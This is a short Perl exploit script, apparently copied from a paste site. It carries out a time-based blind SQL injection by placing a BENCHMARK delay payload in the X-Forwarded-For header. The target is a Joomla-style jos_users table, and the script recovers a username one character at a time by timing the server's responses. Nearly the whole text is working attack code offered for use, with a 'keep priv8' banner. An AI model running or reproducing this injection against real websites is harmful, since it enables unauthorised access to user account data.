#!/usr/bin/perl -wuse Time::HiRes;use LWP;print 'Vuln found by Tom Lan

1. #!/usr/bin/perl -w
2.  
3. use Time::HiRes;
4. use LWP;
5.  
6. print 'Vuln found by Tom Landry - keep priv8 :]' . "\n";
7.  
8. my $url = $ARGV[0];
9. my $push = '0';
10. my $ascii_char = '47';
11. my $master_string = '';
12.  
13. $push = '1';
14. while ("true") {
15. $ascii_char = $ascii_char + 1;
16. my @headers = ('User-Agent' => 'Mozilla/4.2 [en]',
17. 'Accept' => '*/*',
18. 'x-forwarded-for' => "lol\" AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT username from jos_users limit 0,1),$push,1)),0)<$ascii_char),BENCHMARK(900000,SHA(1)),1)) -- /*",);
19.  
20. $start_time = Time::HiRes::time();
21.  
22. my $agent = LWP::UserAgent->new( );
23. $response = $agent->get($url, @headers);
24.  
25. $end_time = Time::HiRes::time();
26.  
27. print $response->content."\n";
28.  
29. my $difference = $end_time - $start_time;
30.  
31. print $difference."\n";
32. if ($difference > 1) {
33. $ascii_char = $ascii_char - 1;
34. print "LOL WTF ".$ascii_char."\n";
35. $master_string .= chr($ascii_char);
36. $push = $push + 1;
37. $ascii_char = '47';
38. }
39. print $master_string."\n";
40. print $start_time."\n";
41. print $end_time."\n";
42. sleep(1);
43. }